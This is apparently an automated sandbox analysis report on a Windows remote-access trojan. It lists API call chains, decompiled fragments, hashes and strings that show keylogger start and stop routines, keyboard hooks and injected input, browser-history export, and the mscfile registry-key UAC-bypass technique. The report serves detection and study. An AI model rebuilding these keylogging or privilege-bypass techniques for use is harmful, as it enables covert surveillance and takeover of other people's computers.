                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                        • atoi.MSVCRT ref: 0040D947
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                        • atoi.MSVCRT ref: 0040D965
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                        • atoi.MSVCRT ref: 0040D981
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@closesocket
                                        • String ID:
                                        • API String ID: 2234106156-0
                                        • Opcode ID: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                        • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                        • Opcode Fuzzy Hash: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                        • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004031F8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                        • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                        • API String ID: 1883807236-2313358711
                                        • Opcode ID: ae895c2781c4a898e140f451f196115381b04db4d99b7ace2a8ac6b7857622d6
                                        • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                        • Opcode Fuzzy Hash: ae895c2781c4a898e140f451f196115381b04db4d99b7ace2a8ac6b7857622d6
                                        • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040AB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                        • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@D@std@@G@std@@$G@2@@std@@$?size@?$basic_string@$??8std@@G@2@@0@V?$basic_string@$??4?$basic_string@CloseOpenQuerySleepV01@Value
                                        • String ID: .exe$WDH$exepath$open$temp_
                                        • API String ID: 3885969548-3088914985
                                        • Opcode ID: fc6f0dbaa82ba8b3878df1807979d4d45e0096af3cddfd5eb8410943aec338c7
                                        • Instruction ID: 60cde0a6a469a490c1b109ae90cccba4ec5744e34f2951ce39ed213dd0605107
                                        • Opcode Fuzzy Hash: fc6f0dbaa82ba8b3878df1807979d4d45e0096af3cddfd5eb8410943aec338c7
                                        • Instruction Fuzzy Hash: 2001D233740314A7DB0097949C59FEB7368DF84351F2040B7BA56A61D1DFB858D187AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405CCA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 19%
                                        			E00405CCA(struct HHOOK__** __ecx) {
				char _v5;
				char _v6;
				void* _t9;
				struct HHOOK__* _t16;
				struct HHOOK__** _t30;

				_push(__ecx);
				_t30 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
					_t9 = 0;
				} else {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
					E00405DD3(__ecx);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
					_t30[0xf] = 0;
					_t6 =  &(_t30[0xd]); // 0x0
					_t30[0xa] = 0;
					CloseHandle( *_t6);
					if(_t30[0xf] == 0) {
						_t16 =  *_t30;
						if(_t16 != 0) {
							UnhookWindowsHookEx(_t16);
							 *_t30 = 0;
						}
					}
					_t9 = 1;
				}
				return _t9;
			}








                                        0x00405ccd
                                        0x00405cd0
                                        0x00405cd8
                                        0x00405d49
                                        0x00405cda
                                        0x00405ce9
                                        0x00405cf1
                                        0x00405d00
                                        0x00405d14
                                        0x00405d1a
                                        0x00405d22
                                        0x00405d25
                                        0x00405d28
                                        0x00405d2b
                                        0x00405d34
                                        0x00405d36
                                        0x00405d3a
                                        0x00405d3d
                                        0x00405d43
                                        0x00405d43
                                        0x00405d3a
                                        0x00405d45
                                        0x00405d45
                                        0x00405d4f

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                        • String ID: Online Keylogger Stopped$[INFO]
                                        • API String ID: 2254939683-2146459034
                                        • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                        • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                        • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                        • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410440, Relevance: 12.1, APIs: 8, Instructions: 86keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: InputSend
                                        • String ID:
                                        • API String ID: 3431551938-0
                                        • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                        • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                        • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                        • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401A5E, Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
				char _v20;
				char _v36;
				void* _t18;
				void* _t20;
				intOrPtr _t39;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t39 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t18 = _t39 - 0x9b;
				if(_t18 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
					 *0x41b288 = 1;
					_t20 = E0040180C( &_v20, __eflags, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(0x41b240, 0x9c, _t20);
				} else {
					if(_t18 == 0) {
						E00401B26();
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}








                                        0x00401a68
                                        0x00401a6e
                                        0x00401a80
                                        0x00401a90
                                        0x00401a9f
                                        0x00401aa9
                                        0x00401ab3
                                        0x00401ab8
                                        0x00401ad5
                                        0x00401ae0
                                        0x00401ae7
                                        0x00401af2
                                        0x00401b02
                                        0x00401aba
                                        0x00401abc
                                        0x00401abe
                                        0x00401abe
                                        0x00401abc
                                        0x00401b0a
                                        0x00401b12
                                        0x00401b1b
                                        0x00401b25

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 00401A80
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                          • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                          • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                          • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                          • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                          • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
